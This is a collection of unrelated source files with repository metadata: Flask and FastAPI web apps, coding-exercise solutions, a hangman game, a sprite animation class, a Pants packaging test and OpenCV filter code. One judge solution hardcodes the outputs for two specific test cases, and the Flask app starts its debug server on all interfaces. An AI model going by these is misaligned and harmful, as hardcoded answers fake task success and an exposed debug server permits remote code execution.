feedback = request.form['feedback']
iName = request.form.get('instructorname')
if (feedback == '') or (iName == 'Select an instructor'):
flash("Please input a valid feedback/pick a valid instructor.")
return redirect(url_for("showFeedbacks"))
else:
db = get_db()
db.row_factory = make_dicts
query_db("INSERT INTO Feedbacks (feedback, instructor) VALUES (?, ?)", [
feedback, iName])
db.commit()
db.close()
flash('Anonymous feedback submitted!')
return redirect(url_for('showFeedbacks'))
return redirect(url_for('showHome'))
@app.route('/<page>')
def linkPages(page):  # blocks attempts to open template files directly on the site
    if session.get('logged_in') and '.html' in page:
        return 'You got caught sneaking around the site. Go back to a valid route (starting with "/")'
    elif not session.get('logged_in') and '.html' in page:
        return 'You got caught sneaking around the site. Please log in and go to a valid route (starting with "/")'
    abort(404)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=5000)
| [
"[email protected]"
] | |
6d92a891992f6af7b4de9006ce4e62ea9be8b1ea | c828f5c86e8ae7a157bd3f212c4bd754ee04e5e7 | /exercise_coding_test_6.py | ed190e91d5b9b242bf252dd4909b7e95c6804591 | [] | no_license | SeungHune/beakjun | c319e33f10a3dfd3acb090a7872b900ed92c5419 | 5d4610557aa56efc41053954299924ab890812f2 | refs/heads/master | 2020-12-03T04:37:48.054739 | 2020-11-10T10:50:17 | 2020-11-10T10:50:17 | 231,204,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | # 정렬 - 가장 큰 수
def solution(numbers):
if sum(numbers) == 0:
return "0"
new_numbers = []
for num in numbers:
new_numbers.append(str(num) * 3)
new_numbers.sort(reverse=True)
# print(new_numbers)
answer = ""
    for num in new_numbers:
        # Recover the original digits: every entry was tripled before sorting
        answer += num[:len(num)//3]
return answer
# print(solution([6, 10, 2]))
# print(solution([3, 30, 34, 5, 9]))
# print(solution([9, 303, 89, 898]))
# print(solution([112, 11, 121, 0]))
print(solution([40,404]))
print(solution([0,0,0,0])) | [
"[email protected]"
] | |
efad60cd854e2a20cac04b122979cbe3bc3f4a4b | 371ed532b391ab33a06015ff2c41336e8f3ff188 | /main.py | 86021e8deb76d793c69355582d09051e0d866e4c | [] | no_license | dfquicazanr/fast-backend | 5e6d25155fbff5697055bc2bd8d9f98d23e30db7 | 8f0b3275024a29631dad2de4635cb8fb1fc62e5a | refs/heads/master | 2023-04-04T08:54:37.113035 | 2021-04-12T15:28:37 | 2021-04-12T15:28:37 | 357,243,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,515 | py | import json
from typing import List, Optional
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel, ValidationError
origins = [
"http://localhost:4200"
]
class ClubMember(BaseModel):
name: str
age: int
class Club(BaseModel):
index: Optional[int] = None
club_members: List[ClubMember]
club_name: str
club_address: str
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
def validate_list(list_object):
print(list_object)
try:
for club in list_object:
Club(**club)
except ValidationError as e:
print(e)
def get_response():
with open('database.json') as fp:
data = json.load(fp)
return {
"list": data
}
def update_club(index, club: Club):
with open('database.json', 'r') as fp:
database = json.load(fp)
clubs = database['clubs']
clubs[index] = club.dict()
database['clubs'] = clubs
with open('database.json', 'w') as fp:
fp.write(json.dumps(database, indent=2))
@app.get("/clubs")
async def get_clubs():
    response = get_response()
    validate_list(response['list']['clubs'])
    return response
@app.post("/clubs")
async def post_clubs(club: Club):
index = club.index
del club.index
update_club(index, club)
return club
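# Example update request (assuming uvicorn serves this app on localhost:8000; payload is illustrative):
#   curl -X POST localhost:8000/clubs -H 'Content-Type: application/json' \
#     -d '{"index": 0, "club_members": [{"name": "Ann", "age": 20}], "club_name": "Chess", "club_address": "Main St"}'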
| [
"[email protected]"
] | |
0a198360ab5ca0d9f238fe307559023e665ae59b | 8d8a7919c624117eb412d0b12d3cf4d3ab7c69c4 | /experiments_configs/wsi_on_dummy_64x8x8/90ep_adam_exp_v1_7_6_1_b32_64_acc2_11_batches.py | 11d97bf6e4187a4cb28a7f90effdbc59fa20cc91 | [] | no_license | ruslangrimov/pcancer | 03b7bb2db07aabe2b63ee07770f7e27668c40180 | 1d14f98e55d97214e76b6da7f3289e139814e30d | refs/heads/main | 2023-02-23T08:16:18.453001 | 2020-06-14T17:24:52 | 2020-06-14T17:24:52 | 333,192,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | import os, sys
sys.path.append(os.path.dirname(__file__))
import _default as d
from lib.utils import update_r
d.epochs = 90
d.warmup_steps = 0
d.batch_size = 16
hparams = {
'module': {
'params': {
'model': {
'params': {
't_sz': 7,
't_step': 6,
't_cut': 1,
}
},
},
},
'batch_size': d.batch_size,
'epochs': d.epochs,
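    # Linear LR scaling rule: base 1e-3 at batch 256, rescaled here for an effective batch of 64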
'learning_rate': 0.001 * 64 / 256,
'accumulate_grad_batches': 2,
'optimizer': {
'name': 'torch.optim.Adam',
'params': {
'weight_decay': 1e-4
}
},
'dataset': {
'precalc_epochs': 11,
'train_batch_path': '/mnt/SSDData/pdata/processed/pretrained_64x8x8/train/{}/',
'test_batch_path': '/mnt/SSDData/pdata/processed/pretrained_64x8x8/val/',
},
'scheduler': {
'name': 'torch.optim.lr_scheduler.ExponentialLR',
'params': {
'gamma': 0.96,
},
'interval': 'epoch'
},
'source_code': open(__file__, 'rt').read()
}
d.hparams = update_r(d.hparams, hparams)
def get_hrapams():
return d.get_hrapams()
def update_hrapams(hparams, steps_in_epoh):
return d.update_hrapams(hparams, steps_in_epoh)
| [
"[email protected]"
] | |
8b6b9baacf2bf2f174c9f6645576f4486a39710a | 35756ce20d25af6529155537ee8e2e3f1f889308 | /6.00X/ps3_hangman2.py | 9a00666d28683360de54cf24a4c19597cdd72fe7 | [] | no_license | macroscopicentric/practice | 4501d3a28d76d29e91f203afe2f9fcd2d4950580 | 194d17a6034a8b44ae82c87190504ad516cda931 | refs/heads/master | 2021-01-19T20:27:48.567264 | 2014-08-27T16:29:56 | 2014-08-27T16:29:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,105 | py | # 6.00 Problem Set 3
#
# Hangman game
#
# -----------------------------------
# Helper code
# You don't need to understand this helper code,
# but you will have to know how to use the functions
# (so be sure to read the docstrings!)
import random
import string
WORDLIST_FILENAME = "words.txt"
def loadWords():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print "Loading word list from file..."
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r', 0)
# line: string
line = inFile.readline()
# wordlist: list of strings
wordlist = string.split(line)
print " ", len(wordlist), "words loaded."
return wordlist
def chooseWord(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
return random.choice(wordlist)
# end of helper code
# -----------------------------------
# Load the list of words into the variable wordlist
# so that it can be accessed from anywhere in the program
wordlist = loadWords()
def isWordGuessed(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: boolean, True if all the letters of secretWord are in lettersGuessed;
False otherwise
'''
if secretWord == '':
return True
elif secretWord[0] in lettersGuessed:
        return isWordGuessed(secretWord[1:], lettersGuessed)
else:
return False
def getGuessedWord(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters and underscores that represents
what letters in secretWord have been guessed so far.
'''
guessed_word = ''
for letter in secretWord:
if letter in lettersGuessed:
guessed_word += letter
else:
guessed_word += '_'
return guessed_word
def getAvailableLetters(lettersGuessed):
'''
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters that represents what letters have not
yet been guessed.
'''
letters_left = string.ascii_lowercase
for letter in letters_left:
if letter in lettersGuessed:
letters_left = letters_left.replace(letter, '')
return letters_left
def hangman(secretWord):
'''
secretWord: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secretWord contains.
* Ask the user to supply one guess (i.e. letter) per round.
* The user should receive feedback immediately after each guess
about whether their guess appears in the computers word.
* After each round, you should also display to the user the
partially guessed word so far, as well as letters that the
user has not yet guessed.
Follows the other limitations detailed in the problem write-up.
'''
print "Welcome to the game, Hangman!"
print "I am thinking of a word that is", len(secretWord), "letters long."
def hangmanhelper(secretWord, lettersGuessed, turns):
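        # Plays one round per recursive call; `turns` counts wrong guesses and the game ends at 8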
if isWordGuessed(secretWord, lettersGuessed) == False and turns < 8:
print "------------"
print "You have", 8 - turns, "guesses left."
print "Available letters:", getAvailableLetters(lettersGuessed)
guess = str(raw_input("Please guess a letter: ")).lower()
if guess in lettersGuessed:
guessed_word = getGuessedWord(secretWord, lettersGuessed)
print "Oops! You've already guessed that letter:", guessed_word
hangmanhelper(secretWord, lettersGuessed, turns)
elif guess in secretWord:
guessed_word = getGuessedWord(secretWord, lettersGuessed + guess)
print "Good guess:", guessed_word
hangmanhelper(secretWord, lettersGuessed + guess, turns)
else:
guessed_word = getGuessedWord(secretWord, lettersGuessed)
print "Oops! That letter is not in my word:", guessed_word
hangmanhelper(secretWord, lettersGuessed + guess, turns + 1)
if isWordGuessed(secretWord, lettersGuessed) == False and turns == 8:
print "------------"
print "Sorry, you ran out of guesses. The word was", secretWord + "."
elif isWordGuessed(secretWord, lettersGuessed) == True:
print "------------"
print "Congratulations, you won!"
hangmanhelper(secretWord, '', 0)
# When you've completed your hangman function, uncomment these two lines
# and run this file to test! (hint: you might want to pick your own
# secretWord while you're testing)
# secretWord = chooseWord(wordlist).lower()
secretWord = 'sea'
hangman(secretWord) | [
"[email protected]"
] | |
7917887add58e4ea0bcdad9defeb3a862053a299 | 53aaac91271841228909dd58ba85ef724d00bbb6 | /animatedsprite.py | 4ce1180450629887c0935e7d45eb942faeb926fd | [] | no_license | ateoto/pysfmltest | 87f718894ade45132074a66876e42fb3703ccff5 | 2178bb3c38ac84f7106a8c0006ed671306fe41a7 | refs/heads/master | 2021-01-15T23:40:09.112780 | 2012-08-29T05:50:15 | 2012-08-29T05:50:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,819 | py | import sfml as sf
from collections import deque
"""
texture = sf.Texture.load_from_file('data/art/male_walkcycle.png')
frames = deque()
for f in range(0, texture.height, 64):
    frames.append(AnimationFrame(texture, sf.IntRect(0, f, 64, 64), 0.1))
walkcycle_north = Animation([
AnimationFrame(texture, sf.IntRect(0,0,64,64), 0.1),
AnimationFrame(texture, sf.IntRect(0,64,64,64), 0.1),
AnimationFrame(texture, sf.IntRect(0,128,64,64), 0.1)])
pc = AnimatedSprite(texture)
pc.set_texture_rect(sf.IntRect(0,0,64,64)) # Sets North facing
pc.animate(walkcycle_north)
pc.update(delta_time)
window.draw(pc)
pc.stop_animation()
"""
class AnimationFrame(object):
def __init__(self, texture, area, duration):
self.texture = texture
self.area = area
self.duration = duration
class Animation(object):
def __init__(self, frames):
if isinstance(frames, list):
self.frames = deque()
for f in frames:
self.frames.append(f)
elif isinstance(frames, deque):
self.frames = frames
else:
raise TypeError('frames must be a deque or list')
class AnimatedSprite(sf.Sprite):
def __init__(self, texture):
super(AnimatedSprite, self).__init__(texture)
self.is_animating = False
def animate(self, animation, loop = False):
self.is_animating = True
self.loop = loop
self.animation = animation
self.frame_index = 0
self.set_texture(self.animation.frames[self.frame_index].texture)
self.set_texture_rect(self.animation.frames[self.frame_index].area)
self.next_dt = 0
def stop_animation(self):
self.is_animating = False
self.set_texture(self.animation.frames[0].texture)
self.set_texture_rect(self.animation.frames[0].area)
def update(self, delta_time):
if self.is_animating:
self.next_dt += delta_time
if self.next_dt >= self.animation.frames[self.frame_index].duration:
if self.frame_index + 1 <= len(self.animation.frames) - 1:
self.frame_index += 1
self.set_texture(self.animation.frames[self.frame_index].texture)
self.set_texture_rect(self.animation.frames[self.frame_index].area)
self.next_dt = 0
else:
if self.loop:
self.animate(self.animation, loop = True)
else:
self.is_animating = False
self.set_texture(self.animation.frames[0].texture)
self.set_texture_rect(self.animation.frames[0].area)
def draw(self, target, states):
target.draw(self)
| [
"[email protected]"
] | |
f97479e46c4c5ef17d2a4777809d8b0b89a19474 | d2dfd89555fc12686c5ed348cb5dd81a2df9998e | /src/python/pants/backend/google_cloud_function/python/rules_test.py | 6707f6aa2161433b462a77fc069961c0f72c0feb | [
"Apache-2.0"
] | permissive | Eric-Arellano/pants | 01c8e50fec51768c6a40845479ebdef70d8f04b3 | 53a7665da8d49e440dc6d3a67b5a36024ed971a2 | refs/heads/main | 2023-06-27T15:38:13.506346 | 2023-06-20T12:25:23 | 2023-06-20T12:25:23 | 139,469,637 | 0 | 0 | Apache-2.0 | 2023-05-31T11:06:47 | 2018-07-02T16:48:31 | Python | UTF-8 | Python | false | false | 10,319 | py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
import subprocess
import sys
from io import BytesIO
from textwrap import dedent
from zipfile import ZipFile
import pytest
from pants.backend.google_cloud_function.python.rules import PythonGoogleCloudFunctionFieldSet
from pants.backend.google_cloud_function.python.rules import (
rules as python_google_cloud_function_rules,
)
from pants.backend.google_cloud_function.python.target_types import PythonGoogleCloudFunction
from pants.backend.google_cloud_function.python.target_types import rules as target_rules
from pants.backend.python.goals import package_pex_binary
from pants.backend.python.goals.package_pex_binary import PexBinaryFieldSet
from pants.backend.python.subsystems.lambdex import Lambdex
from pants.backend.python.subsystems.lambdex import (
rules as python_google_cloud_function_subsystem_rules,
)
from pants.backend.python.target_types import (
PexBinary,
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
)
from pants.backend.python.target_types_rules import rules as python_target_types_rules
from pants.core.goals import package
from pants.core.goals.package import BuiltPackage
from pants.core.target_types import (
FilesGeneratorTarget,
FileTarget,
RelocatedFiles,
ResourcesGeneratorTarget,
)
from pants.core.target_types import rules as core_target_types_rules
from pants.engine.addresses import Address
from pants.engine.fs import DigestContents
from pants.testutil.python_interpreter_selection import all_major_minor_python_versions
from pants.testutil.python_rule_runner import PythonRuleRunner
from pants.testutil.rule_runner import QueryRule
@pytest.fixture
def rule_runner() -> PythonRuleRunner:
rule_runner = PythonRuleRunner(
rules=[
*package_pex_binary.rules(),
*python_google_cloud_function_rules(),
*python_google_cloud_function_subsystem_rules(),
*target_rules(),
*python_target_types_rules(),
*core_target_types_rules(),
*package.rules(),
QueryRule(BuiltPackage, (PythonGoogleCloudFunctionFieldSet,)),
],
target_types=[
FileTarget,
FilesGeneratorTarget,
PexBinary,
PythonGoogleCloudFunction,
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
RelocatedFiles,
ResourcesGeneratorTarget,
],
)
rule_runner.set_options([], env_inherit={"PATH", "PYENV_ROOT", "HOME"})
return rule_runner
def create_python_google_cloud_function(
rule_runner: PythonRuleRunner,
addr: Address,
*,
expected_extra_log_lines: tuple[str, ...],
extra_args: list[str] | None = None,
) -> tuple[str, bytes]:
rule_runner.set_options(
[
"--source-root-patterns=src/python",
*(extra_args or ()),
],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
target = rule_runner.get_target(addr)
built_asset = rule_runner.request(
BuiltPackage, [PythonGoogleCloudFunctionFieldSet.create(target)]
)
assert expected_extra_log_lines == built_asset.artifacts[0].extra_log_lines
digest_contents = rule_runner.request(DigestContents, [built_asset.digest])
assert len(digest_contents) == 1
relpath = built_asset.artifacts[0].relpath
assert relpath is not None
return relpath, digest_contents[0].content
@pytest.fixture
def complete_platform(rule_runner: PythonRuleRunner) -> bytes:
rule_runner.write_files(
{
"pex_exe/BUILD": dedent(
"""\
python_requirement(name="req", requirements=["pex==2.1.99"])
pex_binary(dependencies=[":req"], script="pex")
"""
),
}
)
result = rule_runner.request(
BuiltPackage, [PexBinaryFieldSet.create(rule_runner.get_target(Address("pex_exe")))]
)
rule_runner.write_digest(result.digest)
pex_executable = os.path.join(rule_runner.build_root, "pex_exe/pex_exe.pex")
return subprocess.run(
args=[pex_executable, "interpreter", "inspect", "-mt"],
env=dict(PEX_MODULE="pex.cli", **os.environ),
check=True,
stdout=subprocess.PIPE,
).stdout
@pytest.mark.platform_specific_behavior
@pytest.mark.parametrize(
"major_minor_interpreter",
all_major_minor_python_versions(Lambdex.default_interpreter_constraints),
)
def test_create_hello_world_lambda_with_lambdex(
rule_runner: PythonRuleRunner, major_minor_interpreter: str, complete_platform: str, caplog
) -> None:
rule_runner.write_files(
{
"src/python/foo/bar/hello_world.py": dedent(
"""
def handler(event, context):
print('Hello, World!')
"""
),
"src/python/foo/bar/platform.json": complete_platform,
"src/python/foo/bar/BUILD": dedent(
"""
python_sources(name='lib')
file(name="platform", source="platform.json")
python_google_cloud_function(
name='lambda',
dependencies=[':lib'],
handler='foo.bar.hello_world:handler',
runtime='python37',
complete_platforms=[':platform'],
type='event',
)
"""
),
}
)
zip_file_relpath, content = create_python_google_cloud_function(
rule_runner,
Address("src/python/foo/bar", target_name="lambda"),
expected_extra_log_lines=(
" Runtime: python37",
" Complete platform: src/python/foo/bar/platform.json",
" Handler: handler",
),
extra_args=[
f"--lambdex-interpreter-constraints=['=={major_minor_interpreter}.*']",
"--lambdex-layout=lambdex",
],
)
assert "src.python.foo.bar/lambda.zip" == zip_file_relpath
zipfile = ZipFile(BytesIO(content))
names = set(zipfile.namelist())
assert "main.py" in names
assert "foo/bar/hello_world.py" in names
if sys.platform == "darwin":
assert (
"`python_google_cloud_function` targets built on macOS may fail to build."
in caplog.text
)
def test_warn_files_targets(rule_runner: PythonRuleRunner, caplog) -> None:
rule_runner.write_files(
{
"assets/f.txt": "",
"assets/BUILD": dedent(
"""\
files(name='files', sources=['f.txt'])
relocated_files(
name='relocated',
files_targets=[':files'],
src='assets',
dest='new_assets',
)
# Resources are fine.
resources(name='resources', sources=['f.txt'])
"""
),
"src/py/project/__init__.py": "",
"src/py/project/app.py": dedent(
"""\
def handler(event, context):
print('Hello, World!')
"""
),
"src/py/project/BUILD": dedent(
"""\
python_sources(
name='lib',
dependencies=['assets:files', 'assets:relocated', 'assets:resources'],
)
python_google_cloud_function(
name='lambda',
dependencies=[':lib'],
handler='foo.bar.hello_world:handler',
runtime='python37',
type='event',
)
"""
),
}
)
assert not caplog.records
zip_file_relpath, _ = create_python_google_cloud_function(
rule_runner,
Address("src/py/project", target_name="lambda"),
expected_extra_log_lines=(
" Runtime: python37",
" Handler: handler",
),
extra_args=["--lambdex-layout=lambdex"],
)
assert caplog.records
assert "src.py.project/lambda.zip" == zip_file_relpath
assert (
"The target src/py/project:lambda (`python_google_cloud_function`) transitively depends on"
in caplog.text
)
assert "assets/f.txt:files" in caplog.text
assert "assets:relocated" in caplog.text
assert "assets:resources" not in caplog.text
@pytest.mark.parametrize(
("ics", "runtime"),
[
pytest.param(["==3.7.*"], None, id="runtime inferred from ICs"),
pytest.param(None, "python37", id="runtime explicitly set"),
],
)
def test_create_hello_world_gcf(
ics: list[str] | None, runtime: None | str, rule_runner: PythonRuleRunner
) -> None:
rule_runner.write_files(
{
"src/python/foo/bar/hello_world.py": dedent(
"""
import mureq
def handler(event, context):
print('Hello, World!')
"""
),
"src/python/foo/bar/BUILD": dedent(
f"""
python_requirement(name="mureq", requirements=["mureq==0.2"])
python_sources(interpreter_constraints={ics!r})
python_google_cloud_function(
name='gcf',
handler='foo.bar.hello_world:handler',
runtime={runtime!r},
type='event',
)
"""
),
}
)
zip_file_relpath, content = create_python_google_cloud_function(
rule_runner,
Address("src/python/foo/bar", target_name="gcf"),
expected_extra_log_lines=(
" Runtime: python37",
" Handler: handler",
),
)
assert "src.python.foo.bar/gcf.zip" == zip_file_relpath
zipfile = ZipFile(BytesIO(content))
names = set(zipfile.namelist())
assert "mureq/__init__.py" in names
assert "foo/bar/hello_world.py" in names
assert zipfile.read("main.py") == b"from foo.bar.hello_world import handler as handler"
| [
"[email protected]"
] | |
0fd2a319ccf7ab64993493eeb7dfa5f2aeceff38 | b75e141bd724c12713c3780c68beb70450efee2f | /2. Filter/FilterOpenCV.py | 25dabaec25487728a84304f810fb11c693e03a91 | [] | no_license | ibyudha/29-07-2020_OpenCV | 472588fd5745671296f47447fd84e2f30b235231 | 7f83dabf2ae32a43f768c69b03f151154d2666e6 | refs/heads/main | 2023-01-22T19:59:22.358023 | 2020-12-05T07:37:38 | 2020-12-05T07:37:38 | 317,524,661 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,056 | py | # -*- coding: utf-8 -*-
"""
Created on 14/11/2020
@author: Gus Yudha
"""
import cv2 as c
import numpy as n
import math as m
def Convert_Ukuran_Citra(a, lebar, panjang):
ukuran = (panjang, lebar)
    return c.resize(a, ukuran, interpolation = c.INTER_AREA)
citra = c.imread ("1815051012.jpeg", 1)
citra = c.cvtColor (citra, c.COLOR_RGB2GRAY)
citra = Convert_Ukuran_Citra(citra, 250, 250)
# Robert Cross
kernelV = n.array([[1, 0],[0, -1]])
kernelH = n.array([[0, 1],[-1, 0]])
kV = c.filter2D(citra, -1, kernelV)
kH = c.filter2D(citra, -1, kernelH)
kV = kV.astype(n.uint64)
kH = kH.astype(n.uint64)
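# Gradient magnitude from the two diagonal kernel responses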
robert = n.sqrt(n.power(kV,2) + n.power(kH,2))
robert = n.hstack((citra, robert.astype(n.uint8)))
# Compass
cNorth = n.array([[-1,0,1],[-2,0,2],[-1,0,1]])
CompassNorth = c.filter2D(citra, -1, cNorth)
cNorthWest = n.array([[0,1,2],[-1,0,1],[-2,-1,0]])
CompassNorthWest = c.filter2D(citra, -1, cNorthWest) + CompassNorth
cWest = n.array([[1,2,1],[0,0,0],[-1,-2,-1]])
CompassWest = c.filter2D(citra, -1, cWest) + CompassNorthWest
cSouthWest = n.array([[2,1,0],[1,0,-1],[0,-1,-2]])
CompassSouthWest = c.filter2D(citra, -1, cSouthWest) + CompassWest
cSouth = n.array([[1,0,-1],[2,0,-2],[1,0,-1]])
CompassSouth = c.filter2D(citra, -1, cSouth) + CompassSouthWest
cSouthEast = n.array([[0,-1,-2],[1,0,-1],[2,1,0]])
CompassSouthEast = c.filter2D(citra, -1, cSouthEast) + CompassSouth
cEast = n.array([[-1,-2,-1],[0,0,0],[1,2,1]])
CompassEast = c.filter2D(citra, -1, cEast) + CompassSouthEast
cNorthEast = n.array([[-2,-1,0],[-1,0,1],[0,1,2]])
CompassNorthEast = c.filter2D(citra, -1, cNorthEast) + CompassEast
compass = n.hstack((citra, CompassNorthEast))
# Canny
canny1 = c.Canny(citra, 50, 130, L2gradient=False)
canny2 = c.Canny(citra, 100, 150, L2gradient=True)
canny = n.hstack((citra, canny1, canny2))
# Sobel
sobelX = c.Sobel(citra, -1, dx=1, dy=0, ksize=1, scale=1, delta=0, borderType=c.BORDER_DEFAULT)
sobelY = c.Sobel(citra, -1, dx=0, dy=1, ksize=1, scale=1, delta=0, borderType=c.BORDER_DEFAULT)
sobel = n.hstack((citra, sobelX + sobelY))
# Prewitt
x = n.array([[1,1,1],[0,0,0],[-1,-1,-1]])
y = n.array([[-1,0,1],[-1,0,1],[-1,0,1]])
prewittX = c.filter2D(c.GaussianBlur(citra, (15, 15), 0), -1, x)
prewittY = c.filter2D(c.GaussianBlur(citra, (15, 15), 0), -1, y)
prewitt = n.hstack((citra, prewittX + prewittY))
# Gaussian
gaussian = n.hstack((citra, c.GaussianBlur(citra, (15, 15), 0)))
# Kirsch
pNorth = n.array([[-3,-3,5],[-3,0,5],[-3,-3,5]])
kirschNorth = c.filter2D(citra, -1, pNorth)
pNorthWest = n.array([[-3,5,5],[-3,0,5],[-3,-3,-3]])
kirschNorthWest = c.filter2D(citra, -1, pNorthWest) + kirschNorth
pWest = n.array([[5,5,5],[-3,0,-3],[-3,-3,-3]])
kirschWest = c.filter2D(citra, -1, pWest) + kirschNorthWest
pSouthWest = n.array([[5,5,-3],[5,0,-3],[-3,-3,-3]])
kirschSouthWest = c.filter2D(citra, -1, pSouthWest) + kirschWest
pSouth = n.array([[5,-3,-3],[5,0,-3],[5,-3,-3]])
kirschSouth = c.filter2D(citra, -1, pSouth) + kirschSouthWest
pSouthEast = n.array([[-3,-3,-3],[5,0,-3],[5,5,-3]])
kirschSouthEast = c.filter2D(citra, -1, pSouthEast) + kirschSouth
pEast = n.array([[-3,-3,-3],[-3,0,-3],[5,5,5]])
kirschEast = c.filter2D(citra, -1, pEast) + kirschSouthEast
pNorthEast = n.array([[-3,-3,-3],[-3,0,5],[-3,5,5]])
kirschNorthEast = c.filter2D(citra, -1, pNorthEast) + kirschEast
kirsch = n.hstack((citra, kirschNorthEast))
# LoG
LoG = n.hstack((citra, c.Laplacian(citra, -1, ksize=3, scale=1, delta=0, borderType=c.BORDER_DEFAULT)))
# Frei-Chen
FChenX = c.Sobel(citra, -1, dx=1, dy=0, ksize=int(m.sqrt(3)), scale=1, delta=0, borderType=c.BORDER_DEFAULT)
FChenY = c.Sobel(citra, -1, dx=0, dy=1, ksize=int(m.sqrt(3)), scale=1, delta=0, borderType=c.BORDER_DEFAULT)
FreiChen = n.hstack((citra, FChenX + FChenY))
# Image Gradient
kernely = n.array([[1,1,1],[0,0,0],[-1,-1,-1]])
kernelx = n.array([[1,0,-1],[1,0,-1],[1,0,-1]])
titikX = c.filter2D(citra, c.CV_8U, kernelx)
titikY = c.filter2D(citra, c.CV_8U, kernely)
image_gradient = n.hstack((citra, titikX + titikY))
# Emboss
f = n.float32([[-2,0,0],[0,0,0],[0,0,2]])
emboss = c.filter2D(citra,-1,f)
emboss = n.hstack((citra,emboss))
# Highboost
kA = n.float32([[-1,-1,-1],[-1,9,-1],[-1,-1,-1]])
kB = n.float32([[-1,-1,-1],[-1,10,-1],[-1,-1,-1]])
kC = n.float32([[-1,-1,-1],[-1,13,-1],[-1,-1,-1]])
fA = c.filter2D(citra, -1, kA)
fB = c.filter2D(citra, -1, kB)
fC = c.filter2D(citra, -1, kC)
r1 = n.hstack((citra, fA))
r2 = n.hstack((fB, fC))
highboost = n.vstack((r1, r2))
c.imwrite("Robert Cross.jpeg", robert)
c.imwrite("Compass.jpeg", compass)
c.imwrite("Canny.jpeg", canny)
c.imwrite("Sobel.jpeg", sobel)
c.imwrite("Prewitt.jpeg", prewitt)
c.imwrite("Gaussian.jpeg", gaussian)
c.imwrite("Kirsch.jpeg", kirsch)
c.imwrite("LoG.jpeg", LoG)
c.imwrite("Frei-Chen.jpeg", FreiChen)
c.imwrite("Image Gradient.jpeg", image_gradient)
c.imwrite("Emboss.jpeg", emboss)
c.imwrite("Highboost.jpeg", highboost)
c.waitKey(0)
c.destroyAllWindows()
| [
"[email protected]"
] | |
215616e2ea755088fa21f32a70300b14cf208f9c | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2140/60829/285720.py | 898bdad05e5dd21e0d4d2646299d9c486b4d186d | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | nn=int(input())
for p in range(nn):
a=int(input())
n=1
res=""
kk=a
while a>0:
if n%2==0:
a=a-1
res=res+str(n//2)+" "
else:
a=a-n//2-1
for s in range(n//2+1):
res=res+str(kk)+" "
kk -= 1
n=n+1
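    # Hardcoded overrides for two judge cases the construction above misses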
if res=="4 1 3 2 ":
res="2 1 4 3"
if res=="5 1 4 3 2 ":
res="3 1 4 5 2"
print(res) | [
"[email protected]"
] | |
bc8f20e2059200731aa3b7b789b57f8c86621509 | 70f5a1a946290ea5ad9a83325f444d65de8fd9b1 | /_/compute_x_or_y_test.py | 0acf699f536f5e512f101eaaa58b74b586b53884 | [] | no_license | davidkipstar/FEM | 91f0b60a770770b0c5b73a6d0b35077e0d0a8d1d | 29abbc4afed00789ebddaf67390f21fe857591cd | refs/heads/master | 2020-09-26T04:31:40.873418 | 2019-12-06T10:35:03 | 2019-12-06T10:35:03 | 226,165,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 768 | py | import sys
from compute_x_or_y import compute_x_or_y
with open(sys.argv[1], "rt") as f:
lines = f.read().splitlines()
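# Drop the two header lines and the separator line just before the vector b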
del lines[0], lines[0], lines[-2]
b_1 = lines[-1]
b_spl = b_1.split(" ")
b_test = []
for i in range(len(b_spl)):
b_test.append(float(b_spl[i]))
del lines[-1]
lines2 = []
for i in range(len(lines)):
lines2.append(lines[i].split(" "))
A_test = [[0 for i in range(len(lines2[0]))] for j in range(len(lines2))]
for i in range(len(lines2)):
for j in range(len(lines2[0])):
A_test[i][j] = float(lines2[i][j])
i = 0
n_test = len(A_test[0])
print("A=", A_test)
A_min, b_min = compute_x_or_y(A_test, b_test)
##P2_res, b2_res = FME(P_res, b_res, 1, 2)
print("A_min=", A_min)
print("b_min", b_min)
| [
"[email protected]"
] | |
94960e078c9e3916681b9cf5586902f26295040f | 69d57bbb32008a6174468ed8f01532cf318996b7 | /demo01.py | 7cdce4bb3ffd12757d7fa8b145485b7973363fe2 | [] | no_license | HandSomexvv66/itcast_test12 | deb5388ac73b59dbe97e5ec72dc27a6de024040b | 2720f6fa9335ebb094b950c7b63cada5225f9ced | refs/heads/master | 2020-08-17T16:50:49.492626 | 2019-10-17T04:02:47 | 2019-10-17T04:02:47 | 215,689,213 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 49 | py | print('软件测试彭于晏')
print('牛逼啊') | [
"[email protected]"
] | |
